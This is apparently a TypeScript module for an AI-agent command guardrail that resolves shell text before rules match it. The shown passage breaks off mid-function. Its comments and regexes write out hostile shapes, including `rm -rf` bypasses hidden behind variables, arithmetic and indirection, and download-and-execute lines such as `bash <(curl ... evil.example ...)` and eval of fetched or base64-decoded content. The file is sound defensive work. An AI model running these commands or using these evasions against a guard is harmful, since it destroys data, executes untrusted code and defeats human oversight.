/**
 * Shell-aware command resolution.
 *
 * A guardrail that matches the submitted string and a shell that executes the
 * resolved string are evaluating two different commands. Bash rewrites the text
 * through quote removal, parameter expansion, command substitution, and pipeline
 * assembly before the OS ever sees it, so `D=/; rm -rf $D*` reads as harmless
 * text and runs as `rm -rf /*`.
 *
 * The GuardFall survey (published 2026-06-30) tested eleven agents on this
 * exact gap. Guards that regex the raw string leaked on the large majority of
 * cases; the one design that held did this: resolve first, then match what the
 * shell would actually run.
 *
 * So that is what this module does. It produces a normalized, fully-resolved
 * form of the command plus the structured facts rules need, and the rule engine
 * matches against those instead of the raw text.
 */

export interface CommandSegment {
  /** The executable as the shell will invoke it, with quoting removed. */
  executable: string;
  /** Arguments with quoting removed and expansions substituted. */
  args: string[];
  /** Raw text of this segment before resolution. */
  raw: string;
  /**
   * True when this stage receives content from a preceding stage over an actual
   * pipe. Distinguishing `|` from `&&` and `;` matters: `cat x.json | jq .` is
   * ordinary, while `npm run build && bash postbuild.sh` contains no pipe at all
   * and must not be treated as one.
   */
  fedByPipe: boolean;
}

export interface ResolvedCommand {
  /** Every pipeline stage, left to right. */
  segments: CommandSegment[];
  /** Fully resolved, unquoted command with expansions substituted. */
  resolved: string;
  /** Executable basenames, lowercased, deduplicated. */
  executables: string[];
  /** Substituted values that look like filesystem paths. */
  paths: string[];
  /** Values that look like cloud identifiers. */
  cloudResources: string[];
  /** Interpreters that receive piped or executed content. */
  interpreters: string[];
  /** True when one stage feeds another over a pipe. */
  hasPipeline: boolean;
  /** True when content is generated by command substitution and then executed. */
  hasCommandSubstitution: boolean;
  /** Variables that were expanded but could not be resolved statically. */
  unresolvedVariables: string[];
  /** Heuristic flags describing the shape of the command. */
  traits: string[];
}

/** Interpreters that will execute content arriving from a pipe or a -c string. */
const INTERPRETERS = new Set([
  'sh', 'bash', 'zsh', 'dash', 'ksh', 'csh', 'fish',
  'python', 'python2', 'python3', 'perl', 'ruby', 'node', 'deno', 'bun',
  'php', 'pwsh', 'powershell', 'xvfb-run'
]);

/** Flags that make an interpreter execute an inline program. */
const INLINE_EXEC_FLAGS = new Set([
  '-c', '-e', '--command', '-enc', '--eval', '-eval'
]);

/** Commands that remove data, used to detect destructive intent under an alias. */
const DESTRUCTIVE_BINARIES = new Set([
  'rm', 'rmdir', 'unlink', 'shred', 'srm', 'wipe', 'mkfs', 'fdisk', 'parted',
  'dd', 'truncate', 'truncat'
]);

/**
 * Commands that execute their argument as a program.
 *
 * `bash -c` is caught by the interpreter path, but these take the program
 * without naming a language: `eval "$(curl ...)"` runs whatever the network
 * returns and there is no interpreter token anywhere in the command for the
 * inline-program path to key on.
 */
const EXEC_SINKS = new Set(['eval', 'exec', 'source', '.', 'xargs', 'nohup']);

/**
 * Fetches a program whose contents are not knowable before the call.
 *
 * The URL is deliberately not required. `curl $BASE/payload.sh` names no host
 * at review time, which is the ordinary way an agent composes one, so requiring
 * a literal `http` would miss the case this exists to catch.
 */
const REMOTE_FETCH = /\b(curl|wget|fetch|httpie|http|iwr|invoke-webrequest|invoke-restmethod)\b/i;

/** Decoders whose output is a program rather than data. */
const DECODER = /\bbase64\b[^\n|;]*[ -](-d|--decode|-D)\b|\bb64decode\b|\bbase64decode\b|\bdecodebytes\b|\batob\s*\(|\bfromcharcode\b|\buudecode\b|\bopenssl\s+base6?4\b|\bxxd\s+-r\b|\bcertutil\b[^\n]*-decode\b/i;

/**
 * An inline program that assembles bytes and then runs them. Both halves are
 * required: `base64` alone is a decoder, `os.system` alone is a legitimate call,
 * and the combination is the shape where the destructive verb never appears as
 * a word anywhere in the request.
 */
const INLINE_DECODE = /\bbase64\b|\bb64decode\b|\bdecodebytes\b|\batob\s*\(|\bfromcharcode\b/i;
const INLINE_EXEC = /\bexecsync\b|\bos\.system\b|\bos\.popen\b|\bsubprocess\b|\beval\s*\(|\bexec\s*\(|\bnew\s+function\b|\bspawn\b|\bcheck_output\b/i;

export class ShellResolver {
  /**
   * Resolves a command string the way a POSIX shell would, to the extent that is
   * possible without executing anything. Anything genuinely ambiguous is recorded
   * in `unresolvedVariables` rather than guessed at.
   */
  public static resolve(
    commandOrQuery: string,
    knownVars: Record<string, string> = {}
  ): ResolvedCommand {
    const traits: string[] = [];
    const hasCommandSubstitution = /\$\(|`/.test(commandOrQuery);
    if (hasCommandSubstitution) traits.push('command-substitution');

    // `D=/; rm -rf $D*` is the single most common bypass, and it only resolves if
    // the assignment earlier in the same command is applied first. Shell semantics
    // do exactly that, so the resolver does too.
    const env: Record<string, string> = { ...knownVars };
    const assigned = this.collectAssignments(commandOrQuery);
    for (const [name, value] of assigned) {
      env[name] = value;
      traits.push(`assigned:${name}`);
    }
    // An arithmetic assignment like `T=$(( 0x2f ))` has to reach `env` before
    // expansion, or `rm -rf $T` resolves against a `T` that was never declared
    // and the whole expression reads as two unrelated tokens.
    const arrays = this.collectArrayAssignments(commandOrQuery);
    for (const [name, value] of assigned) {
      if (arrays[name]) continue;
      const arithmetic = new RegExp(`(?:^|[;|&\\s])${name}=\\$\\(\\(([^()]*)\\)\\)`).exec(commandOrQuery);
      if (!arithmetic || arithmetic[1] === undefined) continue;
      const expression = arithmetic[1].trim();
      const computed = this.evaluateArithmetic(expression, { ...knownVars, ...env });
      if (computed === undefined) continue;
      // A value written as a character code rather than a literal is not a path
      // the reviewer can check against intent: `$(( 0x2f ))` yields the number 47,
      // and the reason anyone writes `0x2f` in a delete target is that the `/` it
      // stands for is the thing being hidden. So a non-decimal literal feeding a
      // variable becomes the marked unknown. Plain decimal arithmetic is left
      // alone, because `$((COUNT + 1))` is ordinary and marking it would flag
      // every loop.
      if (/\b0[xXbBoO][0-9a-fA-F_]+\b/.test(expression)) {
        env[name] = '/UNKNOWN';
        traits.push('encoded-path');
        continue;
      }
      env[name] = String(computed);
    }

    const unresolvedVariables: string[] = [];
    const segments = this.splitPipeline(commandOrQuery, env, traits, arrays, unresolvedVariables);
    const executables: string[] = [];
    const paths: string[] = [];
    const cloudResources: string[] = [];
    const interpreters: string[] = [];
    const inlineScripts: string[] = [];

    for (const segment of segments) {
      const execBase = (segment.executable.split('/').pop() || '').toLowerCase();
      if (execBase) executables.push(execBase);
      if (INTERPRETERS.has(execBase)) interpreters.push(execBase);

      for (const arg of segment.args) {
        if (/^[a-zA-Z]:\\|^[a-zA-Z]:\//.test(arg) || arg.startsWith('/')) paths.push(arg);
        const cloud = arg.match(/^i-[0-9a-f]{6,}$|^s3:\/\/[^/]+|^arn:aws:[^\s]+/i);
        if (cloud) cloudResources.push(cloud[0]);
      }

      // `bash -c "<script>"` executes the argument as a program, so the argument
      // is itself a command and has to be resolved recursively.
      const inlineIdx = segment.args.findIndex((a) => INLINE_EXEC_FLAGS.has(a.toLowerCase()));
      if (inlineIdx !== -1 && INTERPRETERS.has(execBase) && segment.args.length > inlineIdx + 1) {
        // `sh -c` takes the whole remainder of the line as the program, not just
        // the next token. Joining the tail is what makes `bash -c "rm -rf /"`
        // resolve to the destructive command it actually runs.
        const script = segment.args.slice(inlineIdx + 1).join(' ');
        const inner = ShellResolver.resolve(script, env);
        executables.push(...inner.executables);
        paths.push(...inner.paths);
        cloudResources.push(...inner.cloudResources);
        interpreters.push(...inner.interpreters);
        unresolvedVariables.push(...inner.unresolvedVariables);
        traits.push('inline-script');
        // The inline program is a command in its own right and must be scored on
        // its own merits, so its resolved text is retained for rule matching.
        inlineScripts.push(inner.resolved);

        // `sh -c "$(remote-fetch)"` executes whatever the network hands it. That
        // is the download-and-execute shape regardless of what the substitution
        // would have produced. Checked against the raw text, because expansion has
        // already rewritten the substitution by this point.
        if (/\$\(|`/.test(segment.raw) || /\$\(|`/.test(script)) {
          traits.push('inline-remote-substitution');
        }
        // A destructive command built at runtime is unknowable at request time.
        if (this.looksDestructive(script)) {
          traits.push('inline-destructive');
        }
        // Decoding bytes and then running them is the same unknowable program by
        // another route, except the destructive verb never appears as a word:
        // `os.system(base64.b64decode('...'))` says nothing a verb list can read.
        if (INLINE_DECODE.test(script) && INLINE_EXEC.test(script)) {
          traits.push('inline-decode-execute');
        }
      }

      // `eval`, `source` and `.` execute their argument exactly as `sh -c` does,
      // with no interpreter token and no `-c` flag to key on. Resolving the
      // argument as a command in its own right is what closes the gap.
      if (EXEC_SINKS.has(execBase) && segment.args.length > 0) {
        const program = segment.args.join(' ');
        const inner = ShellResolver.resolve(program, env);
        executables.push(...inner.executables);
        paths.push(...inner.paths);
        cloudResources.push(...inner.cloudResources);
        interpreters.push(...inner.interpreters);
        unresolvedVariables.push(...inner.unresolvedVariables);
        inlineScripts.push(inner.resolved);
        traits.push('exec-sink');

        // What makes the sink dangerous is not the sink but where its bytes come
        // from. A fetch or a decode hands the sink something no reviewer can read
        // in the request, which is the download-and-execute shape.
        if (REMOTE_FETCH.test(segment.raw) || DECODER.test(segment.raw)) {
          traits.push('sink-remote-content');
        }
        // Decoded content reaching a sink is worth saying plainly even without a
        // fetch, because the payload was assembled in the request.
        if (DECODER.test(segment.raw)) {
          traits.push('encoded-payload');
        }
        if (this.looksDestructive(program)) {
          traits.push('inline-destructive');
        }
      }
    }

    // `bash <(curl -s https://evil.example/i.sh)` reads as an interpreter with one
    // odd argument. The substitution is where the entire program lives, so once
    // it is tracked the fetch inside it is visible to every rule that already
    // handles `curl | sh`.
    if (/<[(]/.test(commandOrQuery) || />[(]/.test(commandOrQuery)) {
      traits.push('process-substitution');
      const substituted = /<[(\s]*([^>]*?)\)?\s*$/.exec(commandOrQuery);
      const body = substituted ? substituted[1] || '' : '';
      const isInterpreted = segments.some((s) => INTERPRETERS.has(
        (s.executable.split('/').pop() || '').toLowerCase()
      ));
      if (isInterpreted && (REMOTE_FETCH.test(body) || DECODER.test(body))) {
        traits.push('process-substitution-exec');
      }
    }

    // A decoder anywhere in the command. Standalone this is harmless — decoding
    // a file to another file is routine — so the trait is recorded as a fact and
    // only scores when it feeds something that executes.
    if (DECODER.test(commandOrQuery)) {
      traits.push('decoded-content');
    }

    // `find ... -delete` and `find ... -exec rm` destroy data without ever naming
    // the destructive binary in a position a naive parser would catch.
    const findMatch = /\bfind\b([\s\S]*)/.exec(commandOrQuery);
    if (findMatch) {
      const findBody = findMatch[1];
      // `-exec rm` and `-ok rm` invoke a destructive binary outright and are
      // caught whatever the search root. Plain `-delete` is frequently routine
      // cleanup or log rotation, so it only counts against a broad root: scoring
      // `find . -name '*.pyc' -delete` as CRITICAL is how a guardrail gets
      // switched off.
      // `-exec rm` and `-ok rm` invoke a destructive binary outright, but
      // `-prune` is an explicit statement that the traversal stops at the match,
      // which is the ordinary shape of `find . -name node_modules -prune -exec
      // rm -rf {}`. Only an unpruned `-exec` counts.
      const explicitRemoval =
        /\s-(exec|ok)\s+(rm|shred|unlink|srm|sh|bash)\b/.test(findBody) &&
        !/\s-prune\b/.test(findBody);
      const broadRoot =
        /(?:^|\s)(~|\$HOME|\$\{HOME\})(?:\s|$)/.test(findBody) ||
        /(?:^|\s)-?\/(?!\/tmp\/)/.test(findBody) ||
        /(?:^|\s)\.\.(\/|\s|$)/.test(findBody);
      if (explicitRemoval || (/\s-delete\b/.test(findBody) && broadRoot)) {
        traits.push('find-delete');
        executables.push('rm');
      }
    }

    // `xargs` turns a stream of arguments into an execution it never shows you.
    if (/(^|\|\s*)xargs\b/.test(commandOrQuery)) traits.push('xargs-exec');

// Anything landing in an interpreter after a pipe is content being executed.
    // `cat file.sh | sh` is the same shape as `curl ... | sh` even though no
    // substitution is involved, so the check does not require one.
    //
    // An interpreter only *runs* its standard input when nothing else names the
    // program. `cat f.json | python3 -m json.tool` is the exception: the module is
    // the program and the piped bytes are its data, so this requires that the
    // receiving stage has no operand of its own.
    if (segments.length > 1) {
      const fed: CommandSegment | undefined = segments.find(
        (s) => s.fedByPipe
          && INTERPRETERS.has((s.executable.split('/').pop() || '').toLowerCase())
          && this.expectsStdinAsProgram(s.args)
      );
      if (fed) {
        traits.push('piped-to-interpreter');
        const base = (fed.executable.split('/').pop() || '').toLowerCase();
        if (!interpreters.includes(base)) interpreters.push(base);
      }
    }

    // Content arriving over a pipe and landing in an interpreter is the
    // download-and-execute shape, whether or not the source looks trusted.
    const hasPipeline = segments.some((s) => s.fedByPipe);
    if (segments.length > 1) traits.push('multi-stage');

    const dedupe = (list: string[]) => Array.from(new Set(list));

    // Inline programs are appended so rule patterns can match them. A command
    // buried in `bash -c "..."` is still a command the shell will run.
    const resolved = [this.rebuild(segments), ...inlineScripts]
      .filter((part) => part && part.length > 0)
      .join(' ;; ');

    return {
      segments,
      resolved,
      executables: dedupe(executables),
      paths: dedupe(paths),
      cloudResources: dedupe(cloudResources),
      interpreters: dedupe(interpreters),
      hasPipeline,
      hasCommandSubstitution,
      unresolvedVariables: dedupe(unresolvedVariables),
      traits: dedupe(traits)
    };
  }

  /**
   * Collects `NAME=value` assignments appearing anywhere in the command, which
   * the shell would apply to every later stage.
   *
   * Without this, `D=/; rm -rf $D*` resolves to `rm -rf UNKNOWN*`, which looks
   * harmless. With it, the substitution is what the shell would actually
   * substitute.
   *
   * Array assignments are returned separately because `D=(/ /etc)` holds two
   * paths, not one string with a space in it, and `${D[@]}` expands to both.
   */
  private static collectAssignments(commandOrQuery: string): Map<string, string> {
    const assignments = new Map<string, string>();

    // `NAME=value` standing alone as a stage: `D=/;` or `D=/ &&`. An array
    // assignment is skipped here and handled by collectArrayAssignments, since
    // `(/)` is a list rather than a literal value.
    const standalone = commandOrQuery.matchAll(/(?:^|[;|&]\s*)([A-Za-z_][A-Za-z0-9_]*)=([^;|&\s]*)/g);
    for (const m of standalone) {
      if (m[1] && !(m[2] || '').startsWith('(')) {
        assignments.set(m[1], this.stripQuotes(m[2] || ''));
      }
    }

    // `export NAME=value` and `NAME=value command` prefixes.
    const exported = commandOrQuery.matchAll(/\b(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)=(?:"([^"]*)"|'([^']*)'|([^\s;&|]+))/g);
    for (const m of exported) {
      const name = m[1];
      if (!name || assignments.has(name)) continue;
      const value = m[2] ?? m[3] ?? m[4] ?? '';
      if (value.startsWith('(')) continue;
      assignments.set(name, value);
    }

    return assignments;
  }

  /**
   * Collects `NAME=(a b c)` array assignments.
   *
   * `${D[@]}` on an unassigned name has to fall back to the marked unknown, but
   * on a declared array the elements are right there in the request and should
   * resolve. Reading the declaration is what keeps `D=(/); rm -rf "${D[@]}"`
   * honest rather than merely suspicious.
   */
  private static collectArrayAssignments(commandOrQuery: string): Record<string, string[]> {
    const arrays: Record<string, string[]> = {};
    const declared = commandOrQuery.matchAll(
      /(?:^|[;|&]\s*)(?:declare\s+-\w+\s+|local\s+|export\s+)?([A-Za-z_][A-Za-z0-9_]*)=\(([^)]*)\)/g
    );
    for (const m of declared) {
      if (!m[1]) continue;
      const elements = (m[2] || '')
        .trim()
        .split(/\s+/)
        .map((element) => this.stripQuotes(element))
        .filter((element) => element.length > 0);
      if (elements.length > 0) arrays[m[1]] = elements;
    }
    return arrays;
  }

  private static stripQuotes(value: string): string {
    return value.replace(/^['"]|['"]$/g, '');
  }

  /**
   * Whether an interpreter fed by a pipe will execute that pipe.
   *
   * `sh` and `bash` with no operands run standard input as a program, which is
   * what makes `cat payload.sh | sh` the download-and-execute shape. But
   * `python3 -m json.tool` names its program on the command line and reads the
   * pipe as data, so treating the two alike flags `cat f.json | python -m
   * json.tool` as execution when it is a reformat. An operand naming a program
   * — a flag that selects one, or a script path — is what separates them.
   */
  private static expectsStdinAsProgram(args: string[]): boolean {
    let operandIndex = -1;
    for (let i = 0; i < args.length; i++) {
      const arg = args[i];
      if (arg === '--') { operandIndex = i + 1; break; }
      if (arg.startsWith('-')) {
        // `-s` and `--stdin` still mean "run the program on stdin"; the flags that
        // name a program mean the opposite.
        if (INLINE_EXEC_FLAGS.has(arg.toLowerCase())) return false;
        if (arg === '-m' || arg === '--module' || arg === '-e' || arg === '--eval' || arg === '--require' || arg === '-r') return false;
        continue;
      }
      // A bare word before any `--` is a script or module name.
      return false;
    }
    return operandIndex === -1 || operandIndex >= args.length;
  }

  /**
   * Whether a program text names a destructive operation.
   *
   * Applied to inline and sink arguments, where the program is assembled by the
   * command itself and is therefore not in the request in readable form. Kept
   * word-bounded so `format` and `drop-in` do not read as deletions.
   */
  private static looksDestructive(text: string): boolean {
    return /\b(rm|rmdir|unlink|shred|srm|dd|mkfs|drop|truncate|delete|wipe)\b/i.test(text);
  }

  /**
   * Splits on pipes at the top level, then resolves each stage. `||` and `&&`
   * are treated as separators too, since both run the following stage.
   */
  private static splitPipeline(
    input: string,
    env: Record<string, string>,
    traits: string[],
    arrays: Record<string, string[]> = {},
    unresolved: string[] = []
  ): CommandSegment[] {
    // Newline is a command separator in POSIX shell, not whitespace. An agent
    // sending a multi-line script is the normal case, not an edge case, so
    // treating it as anything else collapses every later line into an argument
    // of the first.
    const stages = this.splitTopLevel(input, ['\n', '|', '||', '&&', ';', '&']);
    const out: CommandSegment[] = [];
    let previousEndedWithPipe = false;

    for (const stage of stages) {
      const trimmed = stage.text.trim();
      if (!trimmed) continue;

      const substituted = this.expand(trimmed, env, traits, arrays, unresolved);
      const tokens = this.tokenize(substituted);
      if (tokens.length === 0) continue;

      out.push({
        executable: tokens[0],
        args: tokens.slice(1),
        raw: stage.text,
        // A stage is fed by a pipe when the stage *before* it ended with one.
        // `&&` and `;` also split, so `npm run build && bash postbuild.sh` must
        // not look like a pipeline.
        fedByPipe: previousEndedWithPipe
      });

      previousEndedWithPipe = stage.endedBy === '|';
    }

    return out;
  }

  /**
   * Splits on separators while ignoring anything inside quotes or a command
   * substitution, so `echo 'a | b'` stays one stage. Reports which operator
   * terminated each stage, because `|`, `&&` and `;` mean different things to
   * the pipeline checks downstream.
   */
  private static splitTopLevel(
    input: string,
    separators: string[]
  ): Array<{ text: string; endedBy: string }> {
    const parts: Array<{ text: string; endedBy: string }> = [];
    let current = '';
    let quote: string | null = null;
    let substitutionDepth = 0;
    // Longest first so `\n` cannot be missed and `||` is not eaten as two `|`.
    const ordered = [...separators].sort((a, b) => b.length - a.length);

    for (let i = 0; i < input.length; i++) {
      const ch = input[i];

      if (quote) {
        current += ch;
        if (ch === quote && input[i - 1] !== '\\') quote = null;
        continue;
      }

      if (ch === '"' || ch === "'") {
        quote = ch;
        current += ch;
        continue;
      }

      if (ch === '\\' && input[i + 1] !== undefined) {
        current += ch + input[i + 1];
        i++;
        continue;
      }

      if (ch === '$' || ch === '<' || ch === '>') {
        if (input[i + 1] === '(') substitutionDepth++;
      }
      if (ch === ')' && substitutionDepth > 0) substitutionDepth--;

      if (substitutionDepth === 0) {
        const matched = ordered.find((sep) => {
          if (!input.startsWith(sep, i)) return false;
          // A single `|` must not match the first half of `||`.
          if (sep === '|' && input[i + 1] === '|') return false;
          return true;
        });
        if (matched) {
          parts.push({ text: current, endedBy: matched });
          current = '';
          i += matched.length - 1;
          continue;
        }
      }

      current += ch;
    }

    parts.push({ text: current, endedBy: '' });
    return parts;
  }

  /**
   * Performs quote removal and parameter expansion.
   *
   * Command substitution is resolved by taking the literal characters inside it.
   * That is deliberately conservative: `rm -rf $(echo /)` resolves to a token
   * containing a slash, which is what makes it match the destructive rules. We
   * never run anything to find out what a substitution would produce.
   */
  private static expand(
    input: string,
    knownVars: Record<string, string>,
    traits: string[],
    arrays: Record<string, string[]> = {},
    unresolved: string[] = []
  ): string {
    let output = input;

    // Arithmetic expansion runs before `$(`-tracking because `$((` opens two
    // parens while the substitution scanner counts one, which mangles
    // `T=$(( 0x2f ))` into a fragment the parameter regex then cannot read.
    output = this.expandArithmetic(output, knownVars, traits, unresolved);

    // Command substitution is resolved innermost-first. A single non-greedy
    // replacement stops at the first ')', which mangles `$(echo $(date))` into
    // two half-open fragments and loses the outer program.
    output = this.expandSubstitutions(output, 0);

    // Parameter expansion, including every modifier form. `${HOME}` alone is the
    // easy case; `${HOME:0:1}` and `${!HOME}` reach the same deletion while the
    // old two-group regex matched neither, so both scored SAFE.
    output = this.expandParameters(output, knownVars, traits, arrays, unresolved);

    // Brace expansion. `rm -rf /{etc,var,home}` is three deletions, not one path
    // containing commas, and no other layer here knows that.
    output = this.expandBraces(output);

    // Strip quoting. Quotes change tokenisation, not meaning.
    output = output.replace(/'([^']*)'/g, '$1');
    output = output.replace(/"([^"]*)"/g, '$1');

    // Collapse escaped spaces that survive inside the expanded form.
    output = output.replace(/\\(.)/g, '$1');

    return output.replace(/\s+/g, ' ').trim();
  }

  /**
   * Evaluates `$(( ))` for the shell arithmetic a resolver can honestly compute:
   * integer literals, the usual operators, and variable references.
   *
   * Where the expression cannot be evaluated, the result is deliberately not
   * guessed. `T=$(( 0x2f ))` is exactly the shape that hides a root path behind
   * arithmetic, so an unevaluable expression standing in for a destructive target
   * becomes the same marked unknown a bare `$HOME` produces.
   */
  private static expandArithmetic(
    input: string,
    knownVars: Record<string, string>,
    traits: string[],
    unresolved: string[]
  ): string {
    const pattern = /\$\(\(([^()]*)\)\)/g;
    return input.replace(pattern, (match, expr: string) => {
      const value = this.evaluateArithmetic(expr.trim(), knownVars);
      if (value !== undefined) return String(value);

      // Not a literal we can compute. The variable names referenced inside it are
      // the honest report: they are the things a reviewer would need to know.
      const referenced = expr.match(/\b[A-Za-z_][A-Za-z0-9_]*\b/g) || [];
      for (const name of referenced) {
        if (!Object.prototype.hasOwnProperty.call(knownVars, name)) {
          unresolved.push(name);
          traits.push(`unresolved-variable:${name}`);
        }
      }
      traits.push('opaque-arithmetic');
      return DESTRUCTIVE_VARIABLE_NAMES.has(referenced[0]?.toUpperCase() || '')
        ? '/UNKNOWN'
        : `ARITH(${expr.trim()})`;
    });
  }

  /**
   * A small integer evaluator. Deliberately tiny: bash arithmetic is a full C
   * expression language with arrays, parameter expansion and command
   * substitution inside it, and pretending to implement it would mean inventing
   * answers. Anything outside this grammar returns undefined, which the caller
   * treats as unresolvable rather than guessing.
   */
  private static evaluateArithmetic(
    expr: string,
    knownVars: Record<string, string>
  ): number | undefined {
    const tokens = expr.match(/0[xX][0-9a-fA-F]+|0[bB][01]+|\d+|\*\*|<<=?|>>=?|[-+*/%()<>&|^~!]|\b[A-Za-z_][A-Za-z0-9_]*\b/g);
    if (!tokens) return undefined;
    // Reject anything the tokenizer did not consume: a silent gap here would
    // produce a confidently wrong number.
    if (tokens.join('').replace(/\s+/g, '') !== expr.replace(/\s+/g, '')) return undefined;

    let pos = 0;
    const peek = (): string => tokens[pos] ?? '';
    const next = (): string | undefined => tokens[pos++];

    const parsePrimary = (): number | undefined => {
      const token = next();
      if (token === undefined) return undefined;
      if (token === '(') {
        const inner = parseSum();
        return next() === ')' ? inner : undefined;
      }
      if (token === '-') { const v = parsePrimary(); return v === undefined ? undefined : -v; }
      if (token === '+') return parsePrimary();
      if (token === '!') { const v = parsePrimary(); return v === undefined ? undefined : (v === 0 ? 1 : 0); }
      if (token === '~') { const v = parsePrimary(); return v === undefined ? undefined : ~v; }
      if (/^0[xX]/.test(token)) return parseInt(token.slice(2), 16);
      if (/^0[bB]/.test(token)) return parseInt(token.slice(2), 2);
      if (/^\d+$/.test(token)) return Number(token);
      if (/^[A-Za-z_]/.test(token)) {
        const raw = knownVars[token];
        // An unset name is 0 in bash arithmetic. So is one holding a non-number,
        // which is the common case here, and returning 0 keeps `1 + $UNSET` from
        // being reported as an opaque expression.
        const asNumber = raw !== undefined ? Number(raw.trim()) : 0;
        return Number.isFinite(asNumber) ? asNumber : 0;
      }
      return undefined;
    };

    const parseProduct = (): number | undefined => {
      let left = parsePrimary();
      while (left !== undefined && (peek() === '*' || peek() === '/' || peek() === '%')) {
        const op = next();
        const right = parsePrimary();
        if (left === undefined || right === undefined || op === undefined) return undefined;
        // Division and modulo by zero abort in bash, so there is no value here
        // to report.
        if ((op === '/' || op === '%') && right === 0) return undefined;
        if (op === '*') left *= right;
        else if (op === '/') left = Math.trunc(left / right);
        else left %= right;
      }
      return left;
    };

    const parseSum = (): number | undefined => {
      let left = parseProduct();
      while (left !== undefined && (peek() === '+' || peek() === '-')) {
        const op = next();
        const right = parseProduct();
        if (left === undefined || right === undefined || op === undefined) return undefined;
        if (op === '+') left += right;
        else left -= right;
      }
      return left;
    };

    const result = parseSum();
    if (result === undefined || !Number.isSafeInteger(result)) return undefined;
    return pos === tokens.length ? result : undefined;
  }

  /**
   * Recursively resolves `$(...)`, `<(...)`, `>(...)` and backtick substitutions,
   * innermost first, by balancing parentheses instead of matching to the first
   * close.
   *
   * Process substitution is handled here for two reasons. The parens must be
   * tracked or a `|` inside `<(...)` splits the command in half, and the body has
   * to be preserved in the resolved text, because `bash <(curl -s url)` carries
   * its entire payload in the substitution and dropping it leaves an interpreter
   * with an unexplained argument.
   */
  private static expandSubstitutions(input: string, depth: number): string {
    if (depth > 8) return input; // pathological nesting: stop rather than loop

    let output = input.replace(/`([^`]*)`/g, '$ $1 ');

    const dollar = output.search(/[$<]\(/);
    if (dollar === -1) return output;

    const opener = output.slice(dollar, dollar + 2);
    let nesting = 1;
    let i = dollar + 2;
    while (i < output.length && nesting > 0) {
      const ch = output[i];
      if (ch === '(') nesting++;
      else if (ch === ')') nesting--;
      if (nesting === 0) break;
      i++;
    }
    if (nesting !== 0) return output; // unterminated: leave the text alone

    const inner = this.expandSubstitutions(output.slice(dollar + 2, i), depth + 1);
    // `<(` and `>(` are file-descriptor handoffs, not word-producing
    // substitutions, so their body is kept verbatim rather than prefixed. The
    // marker keeps the resolved text unambiguous about where the argument came
    // from, which is what lets the fetch behind it stay visible to the rules.
    const replacement = opener === '$(' ? `$ ${inner} ` : inner;
    const next = output.slice(0, dollar) + replacement + ' ' + output.slice(i + 1);
    return this.expandSubstitutions(next, depth + 1);
  }

  /**
   * Full parameter expansion, covering the modifiers a bypass uses to reach the
   * same value as a bare `${HOME}`: substring, length, indirection, array
   * subscript, and the default-value forms.
   *
   * The two-group regex this replaces handled `${NAME}` and `$NAME` only, so
   * `${HOME:0:1}` and `${!HOME}` fell through both alternatives and survived as
   * literal text that no rule matched.
   */
  private static expandParameters(
    input: string,
    knownVars: Record<string, string>,
    traits: string[],
    arrays: Record<string, string[]>,
    unresolved: string[]
  ): string {
    return input.replace(
      /\$\{([^{}]*)\}|\$([A-Za-z_][A-Za-z0-9_]*)|\$(\d)/g,
      (match, braced: string | undefined, bare: string | undefined, positional: string | undefined) => {
        if (positional !== undefined) return match; // $1, $2: positional, not ours
        if (bare !== undefined) {
          return this.resolveVariable(bare, knownVars, traits, unresolved);
        }
        return this.resolveBracedParameter(braced ?? '', match, knownVars, traits, arrays, unresolved);
      }
    );
  }

  private static resolveVariable(
    name: string,
    knownVars: Record<string, string>,
    traits: string[],
    unresolved: string[]
  ): string {
    if (Object.prototype.hasOwnProperty.call(knownVars, name)) return knownVars[name];
    if (!unresolved.includes(name)) unresolved.push(name);
    traits.push(`unresolved-variable:${name}`);
    return this.placeholderFor(name);
  }

  /**
   * The placeholder an unresolvable name stands for.
   *
   * Only variables that conventionally hold a root or home path are marked.
   * Marking every unknown variable this way scored ordinary scripting like
   * `TARGET=$PWD/build; rm -rf $TARGET` as CRITICAL, which is worse than missing
   * a bypass: it is how people turn the tool off.
   */
  private static placeholderFor(name: string): string {
    return DESTRUCTIVE_VARIABLE_NAMES.has(name.toUpperCase()) ? '/UNKNOWN' : name;
  }

  private static resolveBracedParameter(
    braced: string,
    original: string,
    knownVars: Record<string, string>,
    traits: string[],
    arrays: Record<string, string[]>,
    unresolved: string[]
  ): string {
    // `${#VAR}` — the length of the value. Not a path, but `rm -rf ${#HOME}`
    // deletes a file named after the length, and the target cannot be read off
    // the request, so it is marked rather than resolved to a bare number.
    if (braced.startsWith('#')) {
      const name = braced.slice(1);
      const value = knownVars[name];
      if (value !== undefined) return String(value.length);
      if (!unresolved.includes(name)) unresolved.push(name);
      traits.push(`unresolved-variable:${name}`);
      traits.push('opaque-parameter');
      return this.placeholderFor(name);
    }

    // `${!VAR}` — indirection: the *value* names another variable. Resolvable
    // only when both the pointer and the pointed-at name are known.
    if (braced.startsWith('!')) {
      const pointerName = braced.slice(1);
      const pointer = knownVars[pointerName];
      if (pointer !== undefined) {
        const target = pointer.trim();
        if (Object.prototype.hasOwnProperty.call(knownVars, target)) return knownVars[target];
        if (Object.prototype.hasOwnProperty.call(knownVars, pointerName.toUpperCase())) {
          const upper = knownVars[pointerName.toUpperCase()].trim();
          if (Object.prototype.hasOwnProperty.call(knownVars, upper)) return knownVars[upper];
        }
      }
      if (!unresolved.includes(pointerName)) unresolved.push(pointerName);
      traits.push(`unresolved-variable:${pointerName}`);
      traits.push('opaque-parameter');
      // `${!HOME}` is the indirection bypass: it points at whatever $HOME holds
      // without naming it, so the conservative mark is the same one a bare
      // `$HOME` gets.
      return this.placeholderFor(pointerName);
    }

    // `${VAR[@]}` / `${VAR[*]}` — every element. The assignment is preferred so a
    // declared array resolves rather than being marked; only an array whose
    // contents are not in the request falls back to the mark.
    const arrayRef = /^([A-Za-z_][A-Za-z0-9_]*)(?:\[([@*])\]|\[(\d+)\])$/.exec(braced);
    if (arrayRef && arrayRef[1]) {
      const name = arrayRef[1];
      const elements = arrays[name];
      if (elements && elements.length > 0) return elements.join(' ');
      if (arrayRef[2] !== undefined && arrayRef[3] !== undefined) {
        return this.resolveVariable(name, knownVars, traits, unresolved);
      }
      if (!unresolved.includes(name)) unresolved.push(name);
      traits.push(`unresolved-variable:${name}`);
      traits.push('opaque-parameter');
      return this.placeholderFor(name);
    }

    // `${VAR:offset}` and `${VAR:offset:length}`. The offset itself may be
    // arithmetic, so it is evaluated rather than pattern-matched.
    const substringRef = /^([A-Za-z_][A-Za-z0-9_]*):(-?\d+)?(?::(-?\d+))?$/.exec(braced);
    if (substringRef && substringRef[1]) {
